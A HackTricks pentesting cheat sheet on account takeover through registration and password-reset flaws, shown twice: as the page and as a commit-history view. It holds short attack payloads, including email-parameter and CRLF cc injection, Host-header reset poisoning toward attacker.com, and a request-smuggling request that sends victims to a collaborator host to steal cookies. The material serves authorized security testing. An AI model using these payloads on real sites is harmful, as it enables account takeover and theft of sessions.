hacktricks/pentesting-web/registration-vulnerabilities.md



<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>


# Registration Takeover

## Duplicate Registration

* Try to generate using an existing username
* Check varying the email:
  * uppsercase
  * \+1@
  * add some some in the email
  * special characters in the email name (%00, %09, %20)
  * Put black characters after the email: `test@test.com                    a`
  * victim@gmail.com@attacker.com
  * victim@attacker.com@gmail.com

## Username Enumeration

Check if you can figure out when a username has already been registered inside the application.

## Password Policy

Creating a user check the password policy (check if you can use weak passwords).\
In that case you may try to bruteforce credentials.

## SQL Injection

[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms.

## Oauth Takeovers

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

## SAML Vulnerabilities

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

## Change Email

when registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.

## More Checks

* Check if you can use **disposable emails**
* **Long** **password** (>200) leads to **DoS**
* **Check rate limits on account creation**
* Use username@**burp\_collab**.net and analyze the **callback**

# **Password Reset Takeover**

## Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.

## Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
   `http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`

## Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>

```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```

## IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Attacker have to login with their account and go to the **Change password** feature.
2. Start the Burp Suite and Intercept the request
3. Send it to the repeater tab and edit the parameters : User ID/email\
   `powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`

## Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

The password reset token should be randomly generated and unique every time.\
Try to determine if the token expire or if it’s always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.

* Timestamp
* UserID
* Email of User
* Firstname and Lastname
* Date of Birth
* Cryptography
* Number only
* Small token sequence ( characters between \[A-Z,a-z,0-9])
* Token reuse
* Token expiration date

## Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
2. Inspect the server response and check for `resetToken`
3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`

## Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Register on the system with a username identical to the victim’s username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
2. Request a password reset with your malicious username.
3. Use the token sent to your email and reset the victim password.
4. Connect to the victim account with the new password.

The platform CTFd was vulnerable to this attack.\
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

## Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
2. Leak the current **sessions cookie**
3. Authenticate as the user using the cookie

## Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1\. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` with the goal of open redirect the victims to burpcollab and steal their cookies\
3\. Final request could look like the following

```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```

Hackerone reports exploiting this bug\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

## Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Create a payload for the CSRF, e.g: “HTML form with auto submit for a password change”
2. Send the payload

## Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

JSON Web Token might be used to authenticate an user.

* Edit the JWT with another User ID / Email
* Check for weak JWT signature

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

# References

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)


<details>

<summary><strong>Support HackTricks and get benefits!</strong></summary>

Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!

Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)

Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)

**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**

**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

</details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
 								<summary><strong>Support HackTricks and get benefits!</strong></summary>
 								Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 								Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 								Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 								**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 								</details>
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# Registration Takeover
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Duplicate Registration
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
 								* Try to generate using an existing username
 								* Check varying the email:
 								  * uppsercase
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								  * \+1@
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
+								  * add some some in the email
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								  * special characters in the email name (%00, %09, %20)
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
+								  * Put black characters after the email: `test@test.com                    a`
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
+								  * victim@gmail.com@attacker.com
 								  * victim@attacker.com@gmail.com
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Username Enumeration
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
 								Check if you can figure out when a username has already been registered inside the application.
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Password Policy
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								Creating a user check the password policy (check if you can use weak passwords).\
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
+								In that case you may try to bruteforce credentials.
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## SQL Injection
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix bad chars

											
										
										
											2022-04-05 22:24:52 +00:00
+								[**Check this page** ](sql-injection/#insert-statement)to learn how to attempt account takeovers or extract information via **SQL Injections** in registry forms.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Oauth Takeovers
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="oauth-to-account-takeover.md" %}
 								[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
 								{% endcontent-ref %}
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## SAML Vulnerabilities
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="saml-attacks/" %}
 								[saml-attacks](saml-attacks/)
 								{% endcontent-ref %}
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Change Email
-												GitBook: [master] 7 pages and 2 assets modified
											
										
										
											2021-06-27 15:43:01 +00:00
 								when registered try to change the email and check if this change is correctly validated or can change it to arbitrary emails.
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## More Checks
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
 								* Check if you can use **disposable emails**
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								* **Long** **password** (>200) leads to **DoS**
-												GitBook: [master] 3 pages modified
											
										
										
											2021-06-27 14:55:59 +00:00
+								* **Check rate limits on account creation**
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
+								* Use username@**burp\_collab**.net and analyze the **callback**
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# **Password Reset Takeover**
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Request password reset to your email address
 . Click on the password reset link
 . Don’t change password
 . Click any 3rd party websites(eg: Facebook, twitter)
 . Intercept the request in Burp Suite proxy
 . Check if the referer header is leaking password reset token.
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Intercept the password reset request in Burp Suite
 . Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
 . Forward the request with the modified header\
 								   `http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
 . Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								```powershell
 								# parameter pollution
 								email=victim@mail.com&email=hacker@mail.com
 								# array of emails
 								{"email":["victim@mail.com","hacker@mail.com"]}
 								# carbon copy
 								email=victim@mail.com%0A%0Dcc:hacker@mail.com
 								email=victim@mail.com%0A%0Dbcc:hacker@mail.com
 								# separator
 								email=victim@mail.com,hacker@mail.com
 								email=victim@mail.com%20hacker@mail.com
 								email=victim@mail.com|hacker@mail.com
 								```
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Attacker have to login with their account and go to the **Change password** feature.
 . Start the Burp Suite and Intercept the request
 . Send it to the repeater tab and edit the parameters : User ID/email\
 								   `powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								The password reset token should be randomly generated and unique every time.\
 								Try to determine if the token expire or if it’s always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
 								* Timestamp
 								* UserID
 								* Email of User
 								* Firstname and Lastname
 								* Date of Birth
 								* Cryptography
 								* Number only
 								* Small token sequence ( characters between \[A-Z,a-z,0-9])
 								* Token reuse
 								* Token expiration date
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
 . Inspect the server response and check for `resetToken`
 . Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Register on the system with a username identical to the victim’s username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
 . Request a password reset with your malicious username.
 . Use the token sent to your email and reset the victim password.
 . Connect to the victim account with the new password.
 								The platform CTFd was vulnerable to this attack.\
 								See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
 . Leak the current **sessions cookie**
 . Authenticate as the user using the cookie
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 \. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)\
 								`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
 \. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:\
 								`GET http://something.burpcollaborator.net HTTP/1.1 X:` with the goal of open redirect the victims to burpcollab and steal their cookies\
 \. Final request could look like the following
 								```
 								GET / HTTP/1.1
 								Transfer-Encoding: chunked
 								Host: something.com
 								User-Agent: Smuggler/v1.0
 								Content-Length: 83
 
 								GET http://something.burpcollaborator.net  HTTP/1.1
 								X: X
 								```
 								Hackerone reports exploiting this bug\
 								\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
 								\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 . Create a payload for the CSRF, e.g: “HTML form with auto submit for a password change”
 . Send the payload
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								## Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								JSON Web Token might be used to authenticate an user.
 								* Edit the JWT with another User ID / Email
 								* Check for weak JWT signature
 								{% content-ref url="hacking-jwt-json-web-tokens.md" %}
 								[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
 								{% endcontent-ref %}
-												fix mess

											
										
										
											2022-05-01 12:41:36 +00:00
+								# References
-												GitBook: [#2870] update

											
										
										
											2021-11-30 00:17:48 +00:00
 								* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
 								<summary><strong>Support HackTricks and get benefits!</strong></summary>
 								Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 								Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 								Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 								**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 								</details>